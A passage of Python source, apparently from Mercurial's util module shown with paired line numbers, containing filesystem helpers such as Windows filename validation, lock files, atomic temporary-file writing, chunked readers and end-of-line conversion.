2027 2033 for n in path.replace(b'\\', b'/').split(b'/'):
2028 2034 if not n:
2029 2035 continue
2030 2036 for c in _filenamebytestr(n):
2031 2037 if c in _winreservedchars:
2032 2038 return (
2033 2039 _(
2034 2040 b"filename contains '%s', which is reserved "
2035 2041 b"on Windows"
2036 2042 )
2037 2043 % c
2038 2044 )
2039 2045 if ord(c) <= 31:
2040 2046 return _(
2041 2047 b"filename contains '%s', which is invalid on Windows"
2042 2048 ) % stringutil.escapestr(c)
2043 2049 base = n.split(b'.')[0]
2044 2050 if base and base.lower() in _winreservednames:
2045 2051 return (
2046 2052 _(b"filename contains '%s', which is reserved on Windows")
2047 2053 % base
2048 2054 )
2049 2055 t = n[-1:]
2050 2056 if t in b'. ' and n not in b'..':
2051 2057 return (
2052 2058 _(
2053 2059 b"filename ends with '%s', which is not allowed "
2054 2060 b"on Windows"
2055 2061 )
2056 2062 % t
2057 2063 )
2058 2064
2059 2065
2060 2066 timer = getattr(time, "perf_counter", None)
2061 2067
2062 2068 if pycompat.iswindows:
2063 2069 checkosfilename = checkwinfilename
2064 2070 if not timer:
2065 2071 timer = time.clock
2066 2072 else:
2067 2073 # mercurial.windows doesn't have platform.checkosfilename
2068 2074 checkosfilename = platform.checkosfilename # pytype: disable=module-attr
2069 2075 if not timer:
2070 2076 timer = time.time
2071 2077
2072 2078
2073 2079 def makelock(info, pathname):
2074 2080 """Create a lock file atomically if possible
2075 2081
2076 2082 This may leave a stale lock file if symlink isn't supported and signal
2077 2083 interrupt is enabled.
2078 2084 """
2079 2085 try:
2080 2086 return os.symlink(info, pathname)
2081 2087 except OSError as why:
2082 2088 if why.errno == errno.EEXIST:
2083 2089 raise
2084 2090 except AttributeError: # no symlink in os
2085 2091 pass
2086 2092
2087 2093 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
2088 2094 ld = os.open(pathname, flags)
2089 2095 os.write(ld, info)
2090 2096 os.close(ld)
2091 2097
2092 2098
2093 2099 def readlock(pathname):
2094 2100 try:
2095 2101 return readlink(pathname)
2096 2102 except OSError as why:
2097 2103 if why.errno not in (errno.EINVAL, errno.ENOSYS):
2098 2104 raise
2099 2105 except AttributeError: # no symlink in os
2100 2106 pass
2101 2107 with posixfile(pathname, b'rb') as fp:
2102 2108 return fp.read()
2103 2109
2104 2110
2105 2111 def fstat(fp):
2106 2112 '''stat file object that may not have fileno method.'''
2107 2113 try:
2108 2114 return os.fstat(fp.fileno())
2109 2115 except AttributeError:
2110 2116 return os.stat(fp.name)
2111 2117
2112 2118
2113 2119 # File system features
2114 2120
2115 2121
2116 2122 def fscasesensitive(path):
2117 2123 """
2118 2124 Return true if the given path is on a case-sensitive filesystem
2119 2125
2120 2126 Requires a path (like /foo/.hg) ending with a foldable final
2121 2127 directory component.
2122 2128 """
2123 2129 s1 = os.lstat(path)
2124 2130 d, b = os.path.split(path)
2125 2131 b2 = b.upper()
2126 2132 if b == b2:
2127 2133 b2 = b.lower()
2128 2134 if b == b2:
2129 2135 return True # no evidence against case sensitivity
2130 2136 p2 = os.path.join(d, b2)
2131 2137 try:
2132 2138 s2 = os.lstat(p2)
2133 2139 if s2 == s1:
2134 2140 return False
2135 2141 return True
2136 2142 except OSError:
2137 2143 return True
2138 2144
2139 2145
2140 2146 try:
2141 2147 import re2 # pytype: disable=import-error
2142 2148
2143 2149 _re2 = None
2144 2150 except ImportError:
2145 2151 _re2 = False
2146 2152
2147 2153
2148 2154 class _re(object):
2149 2155 def _checkre2(self):
2150 2156 global _re2
2151 2157 try:
2152 2158 # check if match works, see issue3964
2153 2159 _re2 = bool(re2.match(r'\[([^\[]+)\]', b'[ui]'))
2154 2160 except ImportError:
2155 2161 _re2 = False
2156 2162
2157 2163 def compile(self, pat, flags=0):
2158 2164 '''Compile a regular expression, using re2 if possible
2159 2165
2160 2166 For best performance, use only re2-compatible regexp features. The
2161 2167 only flags from the re module that are re2-compatible are
2162 2168 IGNORECASE and MULTILINE.'''
2163 2169 if _re2 is None:
2164 2170 self._checkre2()
2165 2171 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
2166 2172 if flags & remod.IGNORECASE:
2167 2173 pat = b'(?i)' + pat
2168 2174 if flags & remod.MULTILINE:
2169 2175 pat = b'(?m)' + pat
2170 2176 try:
2171 2177 return re2.compile(pat)
2172 2178 except re2.error:
2173 2179 pass
2174 2180 return remod.compile(pat, flags)
2175 2181
2176 2182 @propertycache
2177 2183 def escape(self):
2178 2184 '''Return the version of escape corresponding to self.compile.
2179 2185
2180 2186 This is imperfect because whether re2 or re is used for a particular
2181 2187 function depends on the flags, etc, but it's the best we can do.
2182 2188 '''
2183 2189 global _re2
2184 2190 if _re2 is None:
2185 2191 self._checkre2()
2186 2192 if _re2:
2187 2193 return re2.escape
2188 2194 else:
2189 2195 return remod.escape
2190 2196
2191 2197
2192 2198 re = _re()
2193 2199
2194 2200 _fspathcache = {}
2195 2201
2196 2202
2197 2203 def fspath(name, root):
2198 2204 '''Get name in the case stored in the filesystem
2199 2205
2200 2206 The name should be relative to root, and be normcase-ed for efficiency.
2201 2207
2202 2208 Note that this function is unnecessary, and should not be
2203 2209 called, for case-sensitive filesystems (simply because it's expensive).
2204 2210
2205 2211 The root should be normcase-ed, too.
2206 2212 '''
2207 2213
2208 2214 def _makefspathcacheentry(dir):
2209 2215 return dict((normcase(n), n) for n in os.listdir(dir))
2210 2216
2211 2217 seps = pycompat.ossep
2212 2218 if pycompat.osaltsep:
2213 2219 seps = seps + pycompat.osaltsep
2214 2220 # Protect backslashes. This gets silly very quickly.
2215 2221 seps.replace(b'\\', b'\\\\')
2216 2222 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2217 2223 dir = os.path.normpath(root)
2218 2224 result = []
2219 2225 for part, sep in pattern.findall(name):
2220 2226 if sep:
2221 2227 result.append(sep)
2222 2228 continue
2223 2229
2224 2230 if dir not in _fspathcache:
2225 2231 _fspathcache[dir] = _makefspathcacheentry(dir)
2226 2232 contents = _fspathcache[dir]
2227 2233
2228 2234 found = contents.get(part)
2229 2235 if not found:
2230 2236 # retry "once per directory" per "dirstate.walk" which
2231 2237 # may take place for each patches of "hg qpush", for example
2232 2238 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2233 2239 found = contents.get(part)
2234 2240
2235 2241 result.append(found or part)
2236 2242 dir = os.path.join(dir, part)
2237 2243
2238 2244 return b''.join(result)
2239 2245
2240 2246
2241 2247 def checknlink(testfile):
2242 2248 '''check whether hardlink count reporting works properly'''
2243 2249
2244 2250 # testfile may be open, so we need a separate file for checking to
2245 2251 # work around issue2543 (or testfile may get lost on Samba shares)
2246 2252 f1, f2, fp = None, None, None
2247 2253 try:
2248 2254 fd, f1 = pycompat.mkstemp(
2249 2255 prefix=b'.%s-' % os.path.basename(testfile),
2250 2256 suffix=b'1~',
2251 2257 dir=os.path.dirname(testfile),
2252 2258 )
2253 2259 os.close(fd)
2254 2260 f2 = b'%s2~' % f1[:-2]
2255 2261
2256 2262 oslink(f1, f2)
2257 2263 # nlinks() may behave differently for files on Windows shares if
2258 2264 # the file is open.
2259 2265 fp = posixfile(f2)
2260 2266 return nlinks(f2) > 1
2261 2267 except OSError:
2262 2268 return False
2263 2269 finally:
2264 2270 if fp is not None:
2265 2271 fp.close()
2266 2272 for f in (f1, f2):
2267 2273 try:
2268 2274 if f is not None:
2269 2275 os.unlink(f)
2270 2276 except OSError:
2271 2277 pass
2272 2278
2273 2279
2274 2280 def endswithsep(path):
2275 2281 '''Check path ends with os.sep or os.altsep.'''
2276 2282 return (
2277 2283 path.endswith(pycompat.ossep)
2278 2284 or pycompat.osaltsep
2279 2285 and path.endswith(pycompat.osaltsep)
2280 2286 )
2281 2287
2282 2288
2283 2289 def splitpath(path):
2284 2290 '''Split path by os.sep.
2285 2291 Note that this function does not use os.altsep because this is
2286 2292 an alternative of simple "xxx.split(os.sep)".
2287 2293 It is recommended to use os.path.normpath() before using this
2288 2294 function if need.'''
2289 2295 return path.split(pycompat.ossep)
2290 2296
2291 2297
2292 2298 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2293 2299 """Create a temporary file with the same contents from name
2294 2300
2295 2301 The permission bits are copied from the original file.
2296 2302
2297 2303 If the temporary file is going to be truncated immediately, you
2298 2304 can use emptyok=True as an optimization.
2299 2305
2300 2306 Returns the name of the temporary file.
2301 2307 """
2302 2308 d, fn = os.path.split(name)
2303 2309 fd, temp = pycompat.mkstemp(prefix=b'.%s-' % fn, suffix=b'~', dir=d)
2304 2310 os.close(fd)
2305 2311 # Temporary files are created with mode 0600, which is usually not
2306 2312 # what we want. If the original file already exists, just copy
2307 2313 # its mode. Otherwise, manually obey umask.
2308 2314 copymode(name, temp, createmode, enforcewritable)
2309 2315
2310 2316 if emptyok:
2311 2317 return temp
2312 2318 try:
2313 2319 try:
2314 2320 ifp = posixfile(name, b"rb")
2315 2321 except IOError as inst:
2316 2322 if inst.errno == errno.ENOENT:
2317 2323 return temp
2318 2324 if not getattr(inst, 'filename', None):
2319 2325 inst.filename = name
2320 2326 raise
2321 2327 ofp = posixfile(temp, b"wb")
2322 2328 for chunk in filechunkiter(ifp):
2323 2329 ofp.write(chunk)
2324 2330 ifp.close()
2325 2331 ofp.close()
2326 2332 except: # re-raises
2327 2333 try:
2328 2334 os.unlink(temp)
2329 2335 except OSError:
2330 2336 pass
2331 2337 raise
2332 2338 return temp
2333 2339
2334 2340
2335 2341 class filestat(object):
2336 2342 """help to exactly detect change of a file
2337 2343
2338 2344 'stat' attribute is result of 'os.stat()' if specified 'path'
2339 2345 exists. Otherwise, it is None. This can avoid preparative
2340 2346 'exists()' examination on client side of this class.
2341 2347 """
2342 2348
2343 2349 def __init__(self, stat):
2344 2350 self.stat = stat
2345 2351
2346 2352 @classmethod
2347 2353 def frompath(cls, path):
2348 2354 try:
2349 2355 stat = os.stat(path)
2350 2356 except OSError as err:
2351 2357 if err.errno != errno.ENOENT:
2352 2358 raise
2353 2359 stat = None
2354 2360 return cls(stat)
2355 2361
2356 2362 @classmethod
2357 2363 def fromfp(cls, fp):
2358 2364 stat = os.fstat(fp.fileno())
2359 2365 return cls(stat)
2360 2366
2361 2367 __hash__ = object.__hash__
2362 2368
2363 2369 def __eq__(self, old):
2364 2370 try:
2365 2371 # if ambiguity between stat of new and old file is
2366 2372 # avoided, comparison of size, ctime and mtime is enough
2367 2373 # to exactly detect change of a file regardless of platform
2368 2374 return (
2369 2375 self.stat.st_size == old.stat.st_size
2370 2376 and self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2371 2377 and self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME]
2372 2378 )
2373 2379 except AttributeError:
2374 2380 pass
2375 2381 try:
2376 2382 return self.stat is None and old.stat is None
2377 2383 except AttributeError:
2378 2384 return False
2379 2385
2380 2386 def isambig(self, old):
2381 2387 """Examine whether new (= self) stat is ambiguous against old one
2382 2388
2383 2389 "S[N]" below means stat of a file at N-th change:
2384 2390
2385 2391 - S[n-1].ctime < S[n].ctime: can detect change of a file
2386 2392 - S[n-1].ctime == S[n].ctime
2387 2393 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2388 2394 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2389 2395 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2390 2396 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2391 2397
2392 2398 Case (*2) above means that a file was changed twice or more at
2393 2399 same time in sec (= S[n-1].ctime), and comparison of timestamp
2394 2400 is ambiguous.
2395 2401
2396 2402 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2397 2403 timestamp is ambiguous".
2398 2404
2399 2405 But advancing mtime only in case (*2) doesn't work as
2400 2406 expected, because naturally advanced S[n].mtime in case (*1)
2401 2407 might be equal to manually advanced S[n-1 or earlier].mtime.
2402 2408
2403 2409 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2404 2410 treated as ambiguous regardless of mtime, to avoid overlooking
2405 2411 by confliction between such mtime.
2406 2412
2407 2413 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2408 2414 S[n].mtime", even if size of a file isn't changed.
2409 2415 """
2410 2416 try:
2411 2417 return self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2412 2418 except AttributeError:
2413 2419 return False
2414 2420
2415 2421 def avoidambig(self, path, old):
2416 2422 """Change file stat of specified path to avoid ambiguity
2417 2423
2418 2424 'old' should be previous filestat of 'path'.
2419 2425
2420 2426 This skips avoiding ambiguity, if a process doesn't have
2421 2427 appropriate privileges for 'path'. This returns False in this
2422 2428 case.
2423 2429
2424 2430 Otherwise, this returns True, as "ambiguity is avoided".
2425 2431 """
2426 2432 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2427 2433 try:
2428 2434 os.utime(path, (advanced, advanced))
2429 2435 except OSError as inst:
2430 2436 if inst.errno == errno.EPERM:
2431 2437 # utime() on the file created by another user causes EPERM,
2432 2438 # if a process doesn't have appropriate privileges
2433 2439 return False
2434 2440 raise
2435 2441 return True
2436 2442
2437 2443 def __ne__(self, other):
2438 2444 return not self == other
2439 2445
2440 2446
2441 2447 class atomictempfile(object):
2442 2448 '''writable file object that atomically updates a file
2443 2449
2444 2450 All writes will go to a temporary copy of the original file. Call
2445 2451 close() when you are done writing, and atomictempfile will rename
2446 2452 the temporary copy to the original name, making the changes
2447 2453 visible. If the object is destroyed without being closed, all your
2448 2454 writes are discarded.
2449 2455
2450 2456 checkambig argument of constructor is used with filestat, and is
2451 2457 useful only if target file is guarded by any lock (e.g. repo.lock
2452 2458 or repo.wlock).
2453 2459 '''
2454 2460
2455 2461 def __init__(self, name, mode=b'w+b', createmode=None, checkambig=False):
2456 2462 self.__name = name # permanent name
2457 2463 self._tempname = mktempcopy(
2458 2464 name,
2459 2465 emptyok=(b'w' in mode),
2460 2466 createmode=createmode,
2461 2467 enforcewritable=(b'w' in mode),
2462 2468 )
2463 2469
2464 2470 self._fp = posixfile(self._tempname, mode)
2465 2471 self._checkambig = checkambig
2466 2472
2467 2473 # delegated methods
2468 2474 self.read = self._fp.read
2469 2475 self.write = self._fp.write
2470 2476 self.seek = self._fp.seek
2471 2477 self.tell = self._fp.tell
2472 2478 self.fileno = self._fp.fileno
2473 2479
2474 2480 def close(self):
2475 2481 if not self._fp.closed:
2476 2482 self._fp.close()
2477 2483 filename = localpath(self.__name)
2478 2484 oldstat = self._checkambig and filestat.frompath(filename)
2479 2485 if oldstat and oldstat.stat:
2480 2486 rename(self._tempname, filename)
2481 2487 newstat = filestat.frompath(filename)
2482 2488 if newstat.isambig(oldstat):
2483 2489 # stat of changed file is ambiguous to original one
2484 2490 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2485 2491 os.utime(filename, (advanced, advanced))
2486 2492 else:
2487 2493 rename(self._tempname, filename)
2488 2494
2489 2495 def discard(self):
2490 2496 if not self._fp.closed:
2491 2497 try:
2492 2498 os.unlink(self._tempname)
2493 2499 except OSError:
2494 2500 pass
2495 2501 self._fp.close()
2496 2502
2497 2503 def __del__(self):
2498 2504 if safehasattr(self, '_fp'): # constructor actually did something
2499 2505 self.discard()
2500 2506
2501 2507 def __enter__(self):
2502 2508 return self
2503 2509
2504 2510 def __exit__(self, exctype, excvalue, traceback):
2505 2511 if exctype is not None:
2506 2512 self.discard()
2507 2513 else:
2508 2514 self.close()
2509 2515
2510 2516
2511 2517 def unlinkpath(f, ignoremissing=False, rmdir=True):
2512 2518 """unlink and remove the directory if it is empty"""
2513 2519 if ignoremissing:
2514 2520 tryunlink(f)
2515 2521 else:
2516 2522 unlink(f)
2517 2523 if rmdir:
2518 2524 # try removing directories that might now be empty
2519 2525 try:
2520 2526 removedirs(os.path.dirname(f))
2521 2527 except OSError:
2522 2528 pass
2523 2529
2524 2530
2525 2531 def tryunlink(f):
2526 2532 """Attempt to remove a file, ignoring ENOENT errors."""
2527 2533 try:
2528 2534 unlink(f)
2529 2535 except OSError as e:
2530 2536 if e.errno != errno.ENOENT:
2531 2537 raise
2532 2538
2533 2539
2534 2540 def makedirs(name, mode=None, notindexed=False):
2535 2541 """recursive directory creation with parent mode inheritance
2536 2542
2537 2543 Newly created directories are marked as "not to be indexed by
2538 2544 the content indexing service", if ``notindexed`` is specified
2539 2545 for "write" mode access.
2540 2546 """
2541 2547 try:
2542 2548 makedir(name, notindexed)
2543 2549 except OSError as err:
2544 2550 if err.errno == errno.EEXIST:
2545 2551 return
2546 2552 if err.errno != errno.ENOENT or not name:
2547 2553 raise
2548 2554 parent = os.path.dirname(os.path.abspath(name))
2549 2555 if parent == name:
2550 2556 raise
2551 2557 makedirs(parent, mode, notindexed)
2552 2558 try:
2553 2559 makedir(name, notindexed)
2554 2560 except OSError as err:
2555 2561 # Catch EEXIST to handle races
2556 2562 if err.errno == errno.EEXIST:
2557 2563 return
2558 2564 raise
2559 2565 if mode is not None:
2560 2566 os.chmod(name, mode)
2561 2567
2562 2568
2563 2569 def readfile(path):
2564 2570 with open(path, b'rb') as fp:
2565 2571 return fp.read()
2566 2572
2567 2573
2568 2574 def writefile(path, text):
2569 2575 with open(path, b'wb') as fp:
2570 2576 fp.write(text)
2571 2577
2572 2578
2573 2579 def appendfile(path, text):
2574 2580 with open(path, b'ab') as fp:
2575 2581 fp.write(text)
2576 2582
2577 2583
2578 2584 class chunkbuffer(object):
2579 2585 """Allow arbitrary sized chunks of data to be efficiently read from an
2580 2586 iterator over chunks of arbitrary size."""
2581 2587
2582 2588 def __init__(self, in_iter):
2583 2589 """in_iter is the iterator that's iterating over the input chunks."""
2584 2590
2585 2591 def splitbig(chunks):
2586 2592 for chunk in chunks:
2587 2593 if len(chunk) > 2 ** 20:
2588 2594 pos = 0
2589 2595 while pos < len(chunk):
2590 2596 end = pos + 2 ** 18
2591 2597 yield chunk[pos:end]
2592 2598 pos = end
2593 2599 else:
2594 2600 yield chunk
2595 2601
2596 2602 self.iter = splitbig(in_iter)
2597 2603 self._queue = collections.deque()
2598 2604 self._chunkoffset = 0
2599 2605
2600 2606 def read(self, l=None):
2601 2607 """Read L bytes of data from the iterator of chunks of data.
2602 2608 Returns less than L bytes if the iterator runs dry.
2603 2609
2604 2610 If size parameter is omitted, read everything"""
2605 2611 if l is None:
2606 2612 return b''.join(self.iter)
2607 2613
2608 2614 left = l
2609 2615 buf = []
2610 2616 queue = self._queue
2611 2617 while left > 0:
2612 2618 # refill the queue
2613 2619 if not queue:
2614 2620 target = 2 ** 18
2615 2621 for chunk in self.iter:
2616 2622 queue.append(chunk)
2617 2623 target -= len(chunk)
2618 2624 if target <= 0:
2619 2625 break
2620 2626 if not queue:
2621 2627 break
2622 2628
2623 2629 # The easy way to do this would be to queue.popleft(), modify the
2624 2630 # chunk (if necessary), then queue.appendleft(). However, for cases
2625 2631 # where we read partial chunk content, this incurs 2 dequeue
2626 2632 # mutations and creates a new str for the remaining chunk in the
2627 2633 # queue. Our code below avoids this overhead.
2628 2634
2629 2635 chunk = queue[0]
2630 2636 chunkl = len(chunk)
2631 2637 offset = self._chunkoffset
2632 2638
2633 2639 # Use full chunk.
2634 2640 if offset == 0 and left >= chunkl:
2635 2641 left -= chunkl
2636 2642 queue.popleft()
2637 2643 buf.append(chunk)
2638 2644 # self._chunkoffset remains at 0.
2639 2645 continue
2640 2646
2641 2647 chunkremaining = chunkl - offset
2642 2648
2643 2649 # Use all of unconsumed part of chunk.
2644 2650 if left >= chunkremaining:
2645 2651 left -= chunkremaining
2646 2652 queue.popleft()
2647 2653 # offset == 0 is enabled by block above, so this won't merely
2648 2654 # copy via ``chunk[0:]``.
2649 2655 buf.append(chunk[offset:])
2650 2656 self._chunkoffset = 0
2651 2657
2652 2658 # Partial chunk needed.
2653 2659 else:
2654 2660 buf.append(chunk[offset : offset + left])
2655 2661 self._chunkoffset += left
2656 2662 left -= chunkremaining
2657 2663
2658 2664 return b''.join(buf)
2659 2665
2660 2666
2661 2667 def filechunkiter(f, size=131072, limit=None):
2662 2668 """Create a generator that produces the data in the file size
2663 2669 (default 131072) bytes at a time, up to optional limit (default is
2664 2670 to read all data). Chunks may be less than size bytes if the
2665 2671 chunk is the last chunk in the file, or the file is a socket or
2666 2672 some other type of file that sometimes reads less data than is
2667 2673 requested."""
2668 2674 assert size >= 0
2669 2675 assert limit is None or limit >= 0
2670 2676 while True:
2671 2677 if limit is None:
2672 2678 nbytes = size
2673 2679 else:
2674 2680 nbytes = min(limit, size)
2675 2681 s = nbytes and f.read(nbytes)
2676 2682 if not s:
2677 2683 break
2678 2684 if limit:
2679 2685 limit -= len(s)
2680 2686 yield s
2681 2687
2682 2688
2683 2689 class cappedreader(object):
2684 2690 """A file object proxy that allows reading up to N bytes.
2685 2691
2686 2692 Given a source file object, instances of this type allow reading up to
2687 2693 N bytes from that source file object. Attempts to read past the allowed
2688 2694 limit are treated as EOF.
2689 2695
2690 2696 It is assumed that I/O is not performed on the original file object
2691 2697 in addition to I/O that is performed by this instance. If there is,
2692 2698 state tracking will get out of sync and unexpected results will ensue.
2693 2699 """
2694 2700
2695 2701 def __init__(self, fh, limit):
2696 2702 """Allow reading up to <limit> bytes from <fh>."""
2697 2703 self._fh = fh
2698 2704 self._left = limit
2699 2705
2700 2706 def read(self, n=-1):
2701 2707 if not self._left:
2702 2708 return b''
2703 2709
2704 2710 if n < 0:
2705 2711 n = self._left
2706 2712
2707 2713 data = self._fh.read(min(n, self._left))
2708 2714 self._left -= len(data)
2709 2715 assert self._left >= 0
2710 2716
2711 2717 return data
2712 2718
2713 2719 def readinto(self, b):
2714 2720 res = self.read(len(b))
2715 2721 if res is None:
2716 2722 return None
2717 2723
2718 2724 b[0 : len(res)] = res
2719 2725 return len(res)
2720 2726
2721 2727
2722 2728 def unitcountfn(*unittable):
2723 2729 '''return a function that renders a readable count of some quantity'''
2724 2730
2725 2731 def go(count):
2726 2732 for multiplier, divisor, format in unittable:
2727 2733 if abs(count) >= divisor * multiplier:
2728 2734 return format % (count / float(divisor))
2729 2735 return unittable[-1][2] % count
2730 2736
2731 2737 return go
2732 2738
2733 2739
2734 2740 def processlinerange(fromline, toline):
2735 2741 """Check that linerange <fromline>:<toline> makes sense and return a
2736 2742 0-based range.
2737 2743
2738 2744 >>> processlinerange(10, 20)
2739 2745 (9, 20)
2740 2746 >>> processlinerange(2, 1)
2741 2747 Traceback (most recent call last):
2742 2748 ...
2743 2749 ParseError: line range must be positive
2744 2750 >>> processlinerange(0, 5)
2745 2751 Traceback (most recent call last):
2746 2752 ...
2747 2753 ParseError: fromline must be strictly positive
2748 2754 """
2749 2755 if toline - fromline < 0:
2750 2756 raise error.ParseError(_(b"line range must be positive"))
2751 2757 if fromline < 1:
2752 2758 raise error.ParseError(_(b"fromline must be strictly positive"))
2753 2759 return fromline - 1, toline
2754 2760
2755 2761
2756 2762 bytecount = unitcountfn(
2757 2763 (100, 1 << 30, _(b'%.0f GB')),
2758 2764 (10, 1 << 30, _(b'%.1f GB')),
2759 2765 (1, 1 << 30, _(b'%.2f GB')),
2760 2766 (100, 1 << 20, _(b'%.0f MB')),
2761 2767 (10, 1 << 20, _(b'%.1f MB')),
2762 2768 (1, 1 << 20, _(b'%.2f MB')),
2763 2769 (100, 1 << 10, _(b'%.0f KB')),
2764 2770 (10, 1 << 10, _(b'%.1f KB')),
2765 2771 (1, 1 << 10, _(b'%.2f KB')),
2766 2772 (1, 1, _(b'%.0f bytes')),
2767 2773 )
2768 2774
2769 2775
2770 2776 class transformingwriter(object):
2771 2777 """Writable file wrapper to transform data by function"""
2772 2778
2773 2779 def __init__(self, fp, encode):
2774 2780 self._fp = fp
2775 2781 self._encode = encode
2776 2782
2777 2783 def close(self):
2778 2784 self._fp.close()
2779 2785
2780 2786 def flush(self):
2781 2787 self._fp.flush()
2782 2788
2783 2789 def write(self, data):
2784 2790 return self._fp.write(self._encode(data))
2785 2791
2786 2792
2787 2793 # Matches a single EOL which can either be a CRLF where repeated CR
2788 2794 # are removed or a LF. We do not care about old Macintosh files, so a
2789 2795 # stray CR is an error.
2790 2796 _eolre = remod.compile(br'\r*\n')
2791 2797
2792 2798
2793 2799 def tolf(s):
2794 2800 return _eolre.sub(b'\n', s)
2795 2801
2796 2802
2797 2803 def tocrlf(s):
2798 2804 return _eolre.sub(b'\r\n', s)
2799 2805
2800 2806
2801 2807 def _crlfwriter(fp):
2802 2808 return transformingwriter(fp, tocrlf)
2803 2809
2804 2810
2805 2811 if pycompat.oslinesep == b'\r\n':
2806 2812 tonativeeol = tocrlf
2807 2813 fromnativeeol = tolf
2808 2814 nativeeolwriter = _crlfwriter
2809 2815 else:
2810 2816 tonativeeol = pycompat.identity
2811 2817 fromnativeeol = pycompat.identity
2812 2818 nativeeolwriter = pycompat.identity
2813 2819
2814 2820 if pyplatform.python_implementation() == b'CPython' and sys.version_info < (
2815 2821 3,
2816 2822 0,
2817 2823 ):
2818 2824 # There is an issue in CPython that some IO methods do not handle EINTR
2819 2825 # correctly. The following table shows what CPython version (and functions)
2820 2826 # are affected (buggy: has the EINTR bug, okay: otherwise):
2821 2827 #
2822 2828 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2823 2829 # --------------------------------------------------
2824 2830 # fp.__iter__ | buggy | buggy | okay
2825 2831 # fp.read* | buggy | okay [1] | okay
2826 2832 #
2827 2833 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2828 2834 #
2829 2835 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2830 2836 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2831 2837 #
2832 2838 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2833 2839 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2834 2840 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2835 2841 # fp.__iter__ but not other fp.read* methods.
2836 2842 #
2837 2843 # On modern systems like Linux, the "read" syscall cannot be interrupted
2838 2844 # when reading "fast" files like on-disk files. So the EINTR issue only
2839 2845 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2840 2846 # files approximately as "fast" files and use the fast (unsafe) code path,
2841 2847 # to minimize the performance impact.
2842 2848 if sys.version_info >= (2, 7, 4):
2843 2849 # fp.readline deals with EINTR correctly, use it as a workaround.
2844 2850 def _safeiterfile(fp):
2845 2851 return iter(fp.readline, b'')
2846 2852
2847 2853 else:
2848 2854 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2849 2855 # note: this may block longer than necessary because of bufsize.
2850 2856 def _safeiterfile(fp, bufsize=4096):
2851 2857 fd = fp.fileno()
2852 2858 line = b''
2853 2859 while True:
2854 2860 try:
2855 2861 buf = os.read(fd, bufsize)
2856 2862 except OSError as ex:
2857 2863 # os.read only raises EINTR before any data is read
2858 2864 if ex.errno == errno.EINTR:
2859 2865 continue
2860 2866 else:
2861 2867 raise
2862 2868 line += buf
2863 2869 if b'\n' in buf:
2864 2870 splitted = line.splitlines(True)
2865 2871 line = b''
2866 2872 for l in splitted:
2867 2873 if l[-1] == b'\n':
2868 2874 yield l
2869 2875 else:
2870 2876 line = l
2871 2877 if not buf:
2872 2878 break
2873 2879 if line:
2874 2880 yield line
2875 2881
2876 2882 def iterfile(fp):
2877 2883 fastpath = True
2878 2884 if type(fp) is file:
2879 2885 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2880 2886 if fastpath:
2881 2887 return fp
2882 2888 else:
2883 2889 return _safeiterfile(fp)
2884 2890
2885 2891
2886 2892 else:
2887 2893 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2888 2894 def iterfile(fp):
2889 2895 return fp
2890 2896
2891 2897
2892 2898 def iterlines(iterator):
2893 2899 for chunk in iterator:
2894 2900 for line in chunk.splitlines():
2895 2901 yield line
2896 2902
2897 2903
2898 2904 def expandpath(path):
2899 2905 return os.path.expanduser(os.path.expandvars(path))
2900 2906
2901 2907
2902 2908 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2903 2909 """Return the result of interpolating items in the mapping into string s.
2904 2910
2905 2911 prefix is a single character string, or a two character string with
2906 2912 a backslash as the first character if the prefix needs to be escaped in
2907 2913 a regular expression.
2908 2914
2909 2915 fn is an optional function that will be applied to the replacement text
2910 2916 just before replacement.
2911 2917
2912 2918 escape_prefix is an optional flag that allows using doubled prefix for
2913 2919 its escaping.
2914 2920 """
2915 2921 fn = fn or (lambda s: s)
2916 2922 patterns = b'|'.join(mapping.keys())
2917 2923 if escape_prefix:
2918 2924 patterns += b'|' + prefix
2919 2925 if len(prefix) > 1:
2920 2926 prefix_char = prefix[1:]
2921 2927 else:
2922 2928 prefix_char = prefix
2923 2929 mapping[prefix_char] = prefix_char
2924 2930 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2925 2931 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2926 2932
2927 2933
2928 2934 def getport(port):
2929 2935 """Return the port for a given network service.
2930 2936
2931 2937 If port is an integer, it's returned as is. If it's a string, it's
2932 2938 looked up using socket.getservbyname(). If there's no matching
2933 2939 service, error.Abort is raised.
2934 2940 """
2935 2941 try:
2936 2942 return int(port)
2937 2943 except ValueError:
2938 2944 pass
2939 2945
2940 2946 try:
2941 2947 return socket.getservbyname(pycompat.sysstr(port))
2942 2948 except socket.error:
2943 2949 raise error.Abort(
2944 2950 _(b"no port number associated with service '%s'") % port
2945 2951 )
2946 2952
2947 2953
2948 2954 class url(object):
2949 2955 r"""Reliable URL parser.
2950 2956
2951 2957 This parses URLs and provides attributes for the following
2952 2958 components:
2953 2959
